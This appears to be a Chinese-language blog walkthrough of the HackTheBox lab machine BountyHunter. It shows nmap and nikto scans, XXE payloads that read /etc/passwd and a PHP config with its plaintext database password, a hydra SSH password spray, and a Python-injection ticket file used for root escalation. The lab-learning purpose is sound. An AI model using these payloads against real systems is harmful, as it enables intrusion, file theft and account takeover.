SugarCrash!

记录学习,想找个师傅带带我

0%

BountyHunter

wp参考:

https://blog.csdn.net/weixin_47156475/article/details/119672224

收集

nmap -sV -T4 -A 10.10.11.100 扫描结果

不是cms

扫目录

nikto -h 10.10.11.100
发现3个php的文件


readme.txt 也没有什么可用信息

然后开始在网站到处点,看看有没有什么后台,找找上传
瞎几把点,点到一个这个玩意儿

好像是提交参数的东西,抓包看下,

1
2
3
4
5
6
7
<?xml version="1.0" encoding="ISO-8859-1"?> 
<bugreport>
<title>a</title>
<cwe>b</cwe>
<cvss>c</cvss>
<reward>d</reward>
</bugreport>

大概率考xxe外部实体注入了,改payload读/etc/passwd

1
2
3
4
5
6
7
<?xml version="1.0" encoding="ISO-8859-1"?> 
<!DOCTYPE data [ <!ENTITY file SYSTEM "file:///etc/passwd">]> <bugreport>
<title>test</title>
<cwe>test</cwe>
<cvss>test</cvss>
<reward>&file;</reward>
</bugreport>

base64加密,url加密

1
PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGRhdGEgWyA8IUVOVElUWSBmaWxlIFNZU1RFTSAiZmlsZTovLy9ldGMvcGFzc3dkIj5dPgoJCTxidWdyZXBvcnQ%2BCgkJPHRpdGxlPnRlc3Q8L3RpdGxlPgoJCTxjd2U%2BdGVzdDwvY3dlPgoJCTxjdnNzPnRlc3Q8L2N2c3M%2BCgkJPHJld2FyZD4mZmlsZTs8L3Jld2FyZD4KCQk8L2J1Z3JlcG9ydD4%3D

先整下来裁剪个用户

伪协议读数据库

1
2
3
4
5
6
7
8
<?xml version="1.0" encoding="ISO-8859-1"?> 
<!DOCTYPE data [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/db.php"> ]>
<bugreport>
<title>&xxe;</title>
<cwe>test</cwe>
<cvss>test</cvss>
<reward>test</reward>
</bugreport>

发包,返回一个base64加密的值

1
PD9waHAKLy8gVE9ETyAtPiBJbXBsZW1lbnQgbG9naW4gc3lzdGVtIHdpdGggdGhlIGRhdGFiYXNlLgokZGJzZXJ2ZXIgPSAibG9jYWxob3N0IjsKJGRibmFtZSA9ICJib3VudHkiOwokZGJ1c2VybmFtZSA9ICJhZG1pbiI7CiRkYnBhc3N3b3JkID0gIm0xOVJvQVUwaFA0MUExc1RzcTZLIjsKJHRlc3R1c2VyID0gInRlc3QiOwo/Pgo=

解密

1
2
3
4
5
6
<?php // TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test"; ?>

密码像加了密也不像加密
尝试登录ssh—无果

用刚刚的保存的文件生成一个密码字典
cut -d : -f 1 passwd >user
将系统账号名(/etc/passwd)保存到特定的文件,就可以:
cut -d: -f 1 /etc/passwd > /tmp/users

九头蛇爆破

1
hydra -L user -p m19RoAU0hP41A1sTsq6K 10.10.11.100 ssh


原来不是这个用户

提权

sudo -l
显示出自己(执行 sudo 的使用者)的权限

自己给生成了一个file.md 修改一个反弹shell

群友的提权文件成功提上了
# Skytrain Inc ## Ticket to root __Ticket Code:__ **102+ 10 == 112 and __import__('os').system('/bin/bash') == False

总结

学到个xxe,然后拿到一个密码记得试试用其他用户试,